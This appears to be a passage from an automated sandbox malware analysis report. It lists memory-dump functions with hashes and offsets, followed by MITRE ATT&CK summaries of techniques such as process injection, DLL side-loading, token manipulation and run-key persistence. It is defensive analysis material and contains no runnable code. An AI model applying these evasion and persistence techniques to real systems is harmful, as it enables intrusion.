Instruction ID: e3408d95e1483ed745a16bdbaa8424dd2f493d67f39ed681c99164d9faaa6cd7
Opcode Fuzzy Hash: 180156d5abf5f17811e3d2193f95ab79cd77982d63662183a0ffcf5620e901f1
Instruction Fuzzy Hash: FE313935A5011D9BDF04EFA4D855AEEBBB6FF88310F10806AE805B7290DB35AD45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0DD74D68 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51a0ad1b9606a2f0f578ca5ed22ac08ceb05d3ee38b9c5f728c7d83fce43e3a4
Instruction ID: 017d08d121c31b05e543f9d5a00e17db2b6cf30f1293201bef4ea8cbf46500d5
Opcode Fuzzy Hash: 51a0ad1b9606a2f0f578ca5ed22ac08ceb05d3ee38b9c5f728c7d83fce43e3a4
Instruction Fuzzy Hash: AD311E35B206188FCB05EF68C49596E77B6EFC9600B10C15AE9069B364EF709D06CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 05A4D4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3308132352.0000000005A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_5a4d000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c716cd2a68bafba8a4ba6fc289e3f43640d298cfe76f156cb7394d0ee8eea33
Instruction ID: 3da2a2c599d7b9fef98d008726b5af35a680b850f78c008b42f0fca406fc3851
Opcode Fuzzy Hash: 1c716cd2a68bafba8a4ba6fc289e3f43640d298cfe76f156cb7394d0ee8eea33
Instruction Fuzzy Hash: E7212571504284DFCB05DF94D9C0F26BF66FBC8318F208569E9094B256C73AD456CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0DD79F89 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f58d745d6f5d6b0e192bfa94a8261262befb93b31d3b2f549637680211b60714
Instruction ID: 35b85404dcd5902e67930baaec19dc5e5d98b2db41be91a8fbc8a48cfe371c13
Opcode Fuzzy Hash: f58d745d6f5d6b0e192bfa94a8261262befb93b31d3b2f549637680211b60714
Instruction Fuzzy Hash: 8D2184323102148FCB159F34D8A897D7BA6EF8962571544AEF506CB362EB35DC05CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05B6D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3308289441.0000000005B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_5b6d000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15ac75747937f3b99cbf4f8314b743f26006a18fa352cf3de94aa2a47ca1203b
Instruction ID: 7eafed563f65ab0cb0cac8c9f8155bdedfbab952c3996a1d3c8a9907dfc14ed5
Opcode Fuzzy Hash: 15ac75747937f3b99cbf4f8314b743f26006a18fa352cf3de94aa2a47ca1203b
Instruction Fuzzy Hash: A9210071644200DFCB14DF24D990F26BB66FB88314F60C5A9E90A4B256C33EE406CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0DD79782 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1284047972d69223db552e132135d298b96ebd398599b2e2fa3da5236fbf5636
Instruction ID: 284df2bb07d1e40e85d5531a549d762c66d67a15a043a77df2e61a3e922a7acb
Opcode Fuzzy Hash: 1284047972d69223db552e132135d298b96ebd398599b2e2fa3da5236fbf5636
Instruction Fuzzy Hash: E621F271A212289FCB14DFA8D9A5EEDB7B5BF48310F154099F502AB262EA70EC01CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0DD79B08 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2eb5e53e704689b6b3fc1bc87f51043f6a8d8fd3484ca7d3b06be42e9bde83d7
Instruction ID: 7ccf031b9b563136eede901f64b1b8791a218f36296f319577e96f8d0a2a36a2
Opcode Fuzzy Hash: 2eb5e53e704689b6b3fc1bc87f51043f6a8d8fd3484ca7d3b06be42e9bde83d7
Instruction Fuzzy Hash: 0A215036A002189FCB15DF58C4949EE7BB6EF8D320F148169E415B7394DB75AC41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 05B6D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3308289441.0000000005B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_5b6d000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 761ae80718248e394fa16cd30090d465079b9d612e9ed6ee053e5749a6464d7b
Instruction ID: e67e0d73062c493e64f228638407a087edac96a889dcefc1b7ba1eefadf1c1ba
Opcode Fuzzy Hash: 761ae80718248e394fa16cd30090d465079b9d612e9ed6ee053e5749a6464d7b
Instruction Fuzzy Hash: 412184755083809FCB02CF14D994B11BF72FB46314F29C5DAD8498F2A7C33A985ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0DD79F98 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fafb03680c89e7787e4da3b6c0877369580463e48f208aae440e7c0828cd3907
Instruction ID: b0734e5072aa33412527d9a65d44f51f244fe029e071e37c4b7ca056247b6185
Opcode Fuzzy Hash: fafb03680c89e7787e4da3b6c0877369580463e48f208aae440e7c0828cd3907
Instruction Fuzzy Hash: 981152363502189FCB15AB24D42857D7B97EFC8251715847AF906CB352EF35DD06CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05A4D4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3308132352.0000000005A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_5a4d000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: bde22fed9924a8e5264679af23d7fea447c03d38e7a2999674cbf1fc7d82f239
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: E011AF76504280CFCB16CF54D5C4F26BF72FB88314F2486A9D9094B256C33AD45ACFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0DD72101 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab36a767d50c71c2f666e2d527ef5b8e09c93c550d9cc7ee6a085af60546192a
Instruction ID: ecbf848bd33058f24e007c97cd41ae042bf001447474f89122152186fafcf5e0
Opcode Fuzzy Hash: ab36a767d50c71c2f666e2d527ef5b8e09c93c550d9cc7ee6a085af60546192a
Instruction Fuzzy Hash: 9511C2317043809FC7269B34C895A3B7BA2FF8A310F04859DE9568B692DB75E802CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0DD73831 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2973b29ec01e302fd5e58cd9a608bcfa9f5c3ccdba0c9d9edbbd4d001995c3bb
Instruction ID: 22434f7714bed2033f14eee09b1caa54fdcfe85ff639b2d903b4d69cb9b924b4
Opcode Fuzzy Hash: 2973b29ec01e302fd5e58cd9a608bcfa9f5c3ccdba0c9d9edbbd4d001995c3bb
Instruction Fuzzy Hash: B7118432B001149FDB14DF58D985F9AB7B6EF89300F1140E9E609AB361DE71AD54CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0DD79808 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 836e8a2c2b9baa99a853e3047ae6842d175ab927ce2d34d341086446bceea677
Instruction ID: b3736cadb26dbae99688ac3356eeb094bee38ecbd3e2e6011de974621b28838e
Opcode Fuzzy Hash: 836e8a2c2b9baa99a853e3047ae6842d175ab927ce2d34d341086446bceea677
Instruction Fuzzy Hash: DB112A31A20224DFCB15DFA8D8A5EADBBB1BF48320F154099F501AB3A2DB74AC05CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0DD7A610 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8f1b659b13a6f99802148b0f4ee2623544c028adeeba2bf7012fd1696881fd3
Instruction ID: 2e8586c357797ccc70b7ba6640d7c154ce1147dadb84be98fbad2674bd04da06
Opcode Fuzzy Hash: e8f1b659b13a6f99802148b0f4ee2623544c028adeeba2bf7012fd1696881fd3
Instruction Fuzzy Hash: E3019E35E106089FCB11DFA8D9449EDBBF1FF89300B10819AE149E7220EB30AA09CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0DD77E00 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 513cd263c5984682d8e861e0f881d438937ddea8eeb15f4ef93d19d1c692afcd
Instruction ID: 73068ea19b904cc4367e179f9e76d94879b181593bfda6b10a437e31f59b0f4f
Opcode Fuzzy Hash: 513cd263c5984682d8e861e0f881d438937ddea8eeb15f4ef93d19d1c692afcd
Instruction Fuzzy Hash: B611B735119280AFCB07CFA4D865D517FB1BF0A20470A85CAE1498F173C626E826EB16

Uniqueness

Uniqueness Score: -1.00%

Function 0DD72110 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c26259ac7ba081e52822629ff106f35d0d984628893119cfb1b66138742d6f2e
Instruction ID: dc5dfb193b4b29866d2146ea3c5325dd48e60bf27615e07a9a4999dce5786134
Opcode Fuzzy Hash: c26259ac7ba081e52822629ff106f35d0d984628893119cfb1b66138742d6f2e
Instruction Fuzzy Hash: 5801B1303002448FD7259A24C584A3B7BA6FFC9320F1485ACE9164B7A1DF75EC02CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0DD7A620 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f3a794426bbda23830a4e438a611fa9b2168403b57d2a7340b930c966c03e2
Instruction ID: a414fd1cf30f44906bb319c67b4c90c6ab76ad823852cbc2797c6beef66bc1b2
Opcode Fuzzy Hash: f5f3a794426bbda23830a4e438a611fa9b2168403b57d2a7340b930c966c03e2
Instruction Fuzzy Hash: 28012C35E006099FCB00DFA9D50499EB7F5FF89710F108169E559A3210EB30AA05CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05A4D603 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3308132352.0000000005A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_5a4d000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38f69499de6cf76f1f2d5755cd99c6db1d7fe3a510442d007d25a5311d30ff34
Instruction ID: 75314bf02bf55859b11ad30da1eab86cfad7bf9096ce2c58742fbf01a146b019
Opcode Fuzzy Hash: 38f69499de6cf76f1f2d5755cd99c6db1d7fe3a510442d007d25a5311d30ff34
Instruction Fuzzy Hash: 69F0F9B6200640AF9720CF0AD984C23FBAEFFD4674715C59AE84A4B616C671EC41CEA0

Uniqueness

Uniqueness Score: -1.00%

Function 0DD79AA0 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e2cb4247623a128ec4d551c9a7be2f799122fbca593e4db45a6ef97834db0f5
Instruction ID: f4c3eee65bdb81e66ca60e3e19a3ff5cc22a209cba4bfe66d59c909c146124a1
Opcode Fuzzy Hash: 8e2cb4247623a128ec4d551c9a7be2f799122fbca593e4db45a6ef97834db0f5
Instruction Fuzzy Hash: 79F02E33F466116FE32486599810B7BF7E9EFC9720F14846EE5059B351DA71EC41C790

Uniqueness

Uniqueness Score: -1.00%

Function 05A4D5F4 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3308132352.0000000005A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_5a4d000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 852b9045873c256c2fc668d96ae9e5d35d8e95ea673e511a7fdf106c6a6dd262
Instruction ID: 6e79b6a75f0c4527871f22d1390c8f798737e1f91a52377d8b7743b7d5dd30fd
Opcode Fuzzy Hash: 852b9045873c256c2fc668d96ae9e5d35d8e95ea673e511a7fdf106c6a6dd262
Instruction Fuzzy Hash: D4F03775104680AFD325CF06CD84C22BBB9FFC966071A8489E84A8B762C631FC42CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0DD72F50 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4592e7cc5737941628604731642a5b73538fb2c96b4f9dd52069028eb0aa56a
Instruction ID: c4b8980870b38ab9bc816a03ab70e06aa8abec82953a3aae41d3060c7227bcf5
Opcode Fuzzy Hash: f4592e7cc5737941628604731642a5b73538fb2c96b4f9dd52069028eb0aa56a
Instruction Fuzzy Hash: DDF0A031740350EFD72426799815B67BB9ADB81315F2184BDE605CB281FF7AEC048398

Uniqueness

Uniqueness Score: -1.00%

Function 0DD72F42 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94fa4600575e8d9f72aee4cf7fcd2259f77ce8aaef98685609f3fb1845ab98fa
Instruction ID: 9d58d0ed7b8ad7cc3d365992a09f2147c7843dd2a9456d75396c4f90e5223ff8
Opcode Fuzzy Hash: 94fa4600575e8d9f72aee4cf7fcd2259f77ce8aaef98685609f3fb1845ab98fa
Instruction Fuzzy Hash: 47F0E230204380DFC72616218812B26BBA9AB52301F1184EEF5418B282EB25EC04C799

Uniqueness

Uniqueness Score: -1.00%

Function 0DD79960 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9782099020de5237770a668915fcd7efbb6556ce01a9f970b05539fb3328d920
Instruction ID: 6a5c9185b9ad8baee2e42d7ed937216044a3ab63fd60f5e3fcebe6931f89beb5
Opcode Fuzzy Hash: 9782099020de5237770a668915fcd7efbb6556ce01a9f970b05539fb3328d920
Instruction Fuzzy Hash: F7E02B7160D3825BCB16937898B019A7FEA9F9B11170940D6D10ACBA86DE34A807C362

Uniqueness

Uniqueness Score: -1.00%

Function 0DD78F18 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b7d4f5856ca31044abd4472626e820f9add0fbbc9e35b29f615c1dde3c3fcd9
Instruction ID: cdbbc5bc535edb2b73dfe35ddaf85a1f193ebd3fd8f5684fc2d4999ccf4d6a7e
Opcode Fuzzy Hash: 9b7d4f5856ca31044abd4472626e820f9add0fbbc9e35b29f615c1dde3c3fcd9
Instruction Fuzzy Hash: C3D01231A10B208BD7299B66940859EB7D6AF88661B05C57AE44A86A44DB795C418FC0

Uniqueness

Uniqueness Score: -1.00%

Function 0DD79970 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaa8d03406faa0cdd284ba7a5a5bb5c38326882fe38a0e87e39101a0f501e20e
Instruction ID: dd6089d4b079de1010c59d8a1960978ea68ad23fe26a0106f4978dc990bb05c4
Opcode Fuzzy Hash: eaa8d03406faa0cdd284ba7a5a5bb5c38326882fe38a0e87e39101a0f501e20e
Instruction Fuzzy Hash: A4D0C9753181154BC718A6EAA45056FB6CFDBC9260B05806AA60A83B84DE74EC028AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0DD7A060 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 252bfc9bd73fdc12a33e31d1f8e5e448086f8bf0503ec580aa1fd8689fa9edee
Instruction ID: 4fba15b029aadb52ab438a6af40962545064b96d31323fe2d883d7bedd9bab61
Opcode Fuzzy Hash: 252bfc9bd73fdc12a33e31d1f8e5e448086f8bf0503ec580aa1fd8689fa9edee
Instruction Fuzzy Hash: C2D067351192909FC706CB24CCA0914BFA1EF5631571CD8DEE4898F167C632A817EB11

Uniqueness

Uniqueness Score: -1.00%

Function 0DD723D0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23a60b7d40c72e07c9328a8c209e37cef80d306ca8187f3ba89babcdc98d2929
Instruction ID: e65d033fb6e2a6f9787904b368843f90740848e251d2dea398c5467ca2cc86ea
Opcode Fuzzy Hash: 23a60b7d40c72e07c9328a8c209e37cef80d306ca8187f3ba89babcdc98d2929
Instruction Fuzzy Hash: 67D0C9310082CC9FC7029B64E8258A57FA49F56B1030D80E7E5498A063DA29A512DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0DD78EB8 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dacf251f8ab6acd0cdcc73da11f8818c3a9498591e2bc9626e95f36ed7d7f63
Instruction ID: 743a3573d1d5c66da641b2bacb277e59ba8f1c5e652a00e06ee4ec7f554941cd
Opcode Fuzzy Hash: 9dacf251f8ab6acd0cdcc73da11f8818c3a9498591e2bc9626e95f36ed7d7f63
Instruction Fuzzy Hash: B5C08C3080020C8FCB205A90D40C332735CEB0422AF1012EDEC0845102E773A8AACAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0DD723E0 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0c92cca6b060b235de1aba28cdd1a2388754ed0046e1561f1cd749fa85af411
Instruction ID: a07ebdfe8be22fb078568c9252564f88be94acb6253cd9f31bbede0571de9ce4
Opcode Fuzzy Hash: e0c92cca6b060b235de1aba28cdd1a2388754ed0046e1561f1cd749fa85af411
Instruction Fuzzy Hash: 9EB0923201020CAB8600AA84E809895BF69AB987117008066B609061218F72B862DA98

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0DD70040 Relevance: 5.2, Strings: 4, Instructions: 189COMMON

Download Yara Rule

Strings

(_]q, xrefs: 0DD70762
(_]q, xrefs: 0DD7072C
(_]q, xrefs: 0DD706F5
(_]q, xrefs: 0DD706EB

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID: (_]q$(_]q$(_]q$(_]q
API String ID: 0-2651352888
Opcode ID: ccbd92f94322e06179b0edb35c47e06f56c866e6728d8f4afb7f7cfe4299fc41
Instruction ID: 536b70600e8721f3b5399207a946d06dd96a928fa51e93912b98b8a007bbb48c
Opcode Fuzzy Hash: ccbd92f94322e06179b0edb35c47e06f56c866e6728d8f4afb7f7cfe4299fc41
Instruction Fuzzy Hash: 2F617B75B10204CFCB04AF68C49497E7BB2FF89310B1589A9E546DB3A1EB35EC42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0DD76178 Relevance: 5.2, Strings: 4, Instructions: 164COMMON

Download Yara Rule

Strings

\9s, xrefs: 0DD7627A
,aq, xrefs: 0DD76191
(aq, xrefs: 0DD761F1
(8s, xrefs: 0DD762CF

Memory Dump Source

Source File: 00000019.00000002.3316865721.000000000DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_dd70000_ilasm.jbxd

Similarity

API ID:
String ID: (8s$(aq$,aq$\9s
API String ID: 0-1371468290
Opcode ID: 69b116c47e583a94a04c037eb77c79fa7413d99344a076c543d3fb5306251d5b
Instruction ID: b444a99f59146b43ad38d9bb13816db7f0d588a6f5b258de58c8bf25f833a8d4
Opcode Fuzzy Hash: 69b116c47e583a94a04c037eb77c79fa7413d99344a076c543d3fb5306251d5b
Instruction Fuzzy Hash: 7651D3337001596F8F169EB99C508FFBFEAAFC9111B04406AFA45D3251DA29C9159B60

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

